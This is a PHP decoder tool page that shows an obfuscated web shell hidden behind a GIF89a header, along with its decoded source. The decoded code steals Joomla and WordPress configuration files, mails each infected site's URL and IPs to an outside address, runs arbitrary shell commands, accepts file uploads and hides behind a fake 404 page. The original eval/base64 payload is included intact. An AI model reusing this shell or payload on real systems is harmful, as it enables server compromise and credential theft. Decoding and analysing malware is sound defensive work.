Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89a<?php eval(gzinflate(base64_decode(strrev(str_rot13('iuCbtOjTCtQC5k8OOC2K/to9nSO0n2..

Decoded Output download

if(isset($_GET['j'])){
	$p1="../../../../../../../";
	$p2="../../../../../../";
	$p3="../../../../../";
	$p4="../../../../";
	$p5="../../../";
	$p6="../../";
	$p7="../";
		$j=file_get_contents($p1."configuration.php");
		if(!$j){
			$j=file_get_contents($p2."configuration.php");
			if(!$j){
				$j=file_get_contents($p3."configuration.php");
				if(!$j){
					$j=file_get_contents($p4."configuration.php");
					if(!$j){
						$j=file_get_contents($p5."configuration.php");
						if(!$j){
							$j=file_get_contents($p6."configuration.php");
						if(!$j){
							$j=file_get_contents($p7."configuration.php");
					if(!$j){$j=file_get_contents("configuration.php");
						}
					}
				}
			}
		}
	}
}
echo $j;
exit;
}
if(isset($_GET['w'])){
	$p1="../../../../../../../";
	$p2="../../../../../../";
	$p3="../../../../../";
	$p4="../../../../";
	$p5="../../../";
	$p6="../../";
	$p7="../";
			$w=file_get_contents($p1."wp-config.php");
			if(!$w){
				$w=file_get_contents($p2."wp-config.php");
				if(!$w){
					$w=file_get_contents($p3."wp-config.php");
				if(!$w){$w=file_get_contents($p4."wp-config.php");
			if(!$w){$w=file_get_contents($p5."wp-config.php");
		if(!$w){$w=file_get_contents($p6."wp-config.php");
	if(!$w){$w=file_get_contents($p7."wp-config.php");
if(!$w){$w=file_get_contents("wp-config.php");
						}
					}
				}
			}
		}
	}
}
echo $w;
exit;
}
	if (!isset($_SESSION['bajak']))	{
		$visitcount = 0;
		$web = $_SERVER["HTTP_HOST"];
		$inj = $_SERVER["REQUEST_URI"];
		$body = "Setoran Shells 
$web$inj";
		$safem0de = @ini_get('safe_mode');
	if (!$safem0de) {
		$security= "SAFE_MODE = OFF G-one irc.private.id";
	}else {
		$security= "SAFE_MODE = ON G-one irc.private.id";
	};
	$serper=gethostbyname($_SERVER['SERVER_ADDR']);
	$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
		mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
		$_SESSION['bajak'] = 0;
	}else {
		$_SESSION['bajak']++;
	};
	if(isset($_GET['clone'])){
		$source = $_SERVER['SCRIPT_FILENAME'];
		$desti = $_SERVER['DOCUMENT_ROOT'].'/'.'wpa.php';
			rename($source, $desti);
		}
		$safem0de = @ini_get('safe_mode');
	if (!$safem0de) {
		$security= "SAFE_MODE : OFF G-one irc.private.id";
	}else {
		$security= "SAFE_MODE : ON G-one irc.private.id";
	}
		echo "<title>-= pl@NETWORK =-</title><br>";
		echo "<font size=5 color=#64D300>We Are Not Hacker !<br>";
		echo "<font size=4 color=#64D300>Server : irc.private.id 6667<br>";
		echo "<font size=3 color=#64D300>Status : UpTime Top Ranking<br><br>";
		echo "<font size=2 color=#64D300><b>".$security."</b><br>";
			$cur_user="(".get_current_user().")";
		echo "<font size=2 color=#64D300><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
		echo "<font size=2 color=#64D300><b>Uname : ".php_uname()."</b><br>";
	function pwd() {
		$cwd = getcwd();
	if($u=strrpos($cwd,'/')){
	if($u!=strlen($cwd)-1){
		return $cwd.'/';
	}else{
		return $cwd;
	};
	}
	elseif($u=strrpos($cwd,'\')){
	if($u!=strlen($cwd)-1){
		return $cwd.'\';
	}else{
		return $cwd;
	};
    };
}
if(isset($_GET['220'])){
		echo '<form method="POST" action=""><font size=2 color=#64D300><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="eXcute"></form>';
		echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#64D300><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#64D300><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';

	if(isset($_POST['submit'])){
		$uploaddir = pwd();
	if(!$name=$_POST['newname']){
		$name = $_FILES['userfile']['name'];
		};
		move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
	if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
		echo "Upload Failed";
		} else {
		 echo "Upload Success to ".$uploaddir.$name." Boss ";
	 }
     }
}
	if(isset($_POST['command'])){
		$cmd = $_POST['cmd'];
		echo "<pre><font size=3 color=#FFF5EE>".shell_exec($cmd)."</font></pre>";
	}
	elseif(isset($_GET['220'])){
		$comd = $_GET['220'];
		echo "<pre><font size=3 color=#64D300>".shell_exec($comd)."</font></pre>";
		echo "<pre><font size=3 color=#64D300>".shell_exec('ls -la')."</font></pre>";
	} else {
                header("HTTP/1.0 404 Not Found");
                header("Status: 404 Not Found");
                echo "<h1>Error 404 Not Found</h1>";
                echo "The requested URL was not found on this server.";
                die();
                exit();
            }
		echo "<br><br><center><font size=4 color=#FFF5EE>We <font size=4 color=#FF0000>Are<font size=4 color=white> Not <font size=4 color=#FFF5EE>Hacker</center></br>";
?>
<link REL="SHORTCUT ICON" HREF="http://www.forum.romanisti-indonesia.com/Smileys/default/b_indonesia.gif"></link><body bgcolor="#000000"><script type="text/javascript">if (self==top) {
	function netbro_cache_analytics(fn, callback) {
	setTimeout(function() {
	fn();
	callback();
	}, 0);
}
	function sync(fn) {
	fn();
}
	function requestCfs(){
	var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");
	var idc_glo_r = Math.floor(Math.random()*99999999999);
	var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "ms=" + "4TtHaUQnUEiP6K%2fc5C582HVlH3eBnL31rJNUX05ZwZQwqeKiO619Ix4klxD2xNBOIi3iGPZ1r88qO65b%2bYaLsIqOqYRoIkEWUs3l9pAKCEfbwhu30sORyWA5UY%2bnkGV23NMrHoCofHIQHqHEQp82ZmkVU%2fkXofJJXjn7I4Alj024rVyK%2f2kVqHlkiahyrwrGAqe1AHM9iPvr7Wf3GehZ9vNT4b2Q%2bEyAd1A3YbxW7FrCYfw29e8SGGMzYUViQYZllu7110X6MRNcJWQyUEOt2AkYhsQH4sI1Sh%2bld7mQpIruClvMC65vB%2bzGjOe2yqlG7gklnkOWVAOImvkqyr2Fv8Yg1ie%2bPPnRA0lWU2%2fm%2b0sQ89f819IPCd0s6ZIoxnGVBy3YeXw5RGeKOTFTPF2pLL0J%2fgZQfCKe4drtC5cvPgCfYym6m3JD3008aYrH6b7xOcWDJtSdcBs6YpsMmzpKRTP5Ocwm7azk9FW8WIa4%2bDhaHk8YmZujOPM4esjQFTsaxq%2bowheRh%2fU6Nxk6oWbIw1lGQyH%2fz5Xq" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;
	var bsa = document.createElement('script');
	bsa.type = 'text/javascript';
	bsa.async = true;
	bsa.src = url;
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);
		}netbro_cache_analytics(requestCfs, function(){});
	};
</script></body>

Did this file decode correctly?

Original Code

GIF89a<?php
eval(gzinflate(base64_decode(strrev(str_rot13('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')))));
?>

Function Calls

strrev 1
gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 f06e27be7e69771812f16a718f939a45
Eval Count 1
Decode Time 55 ms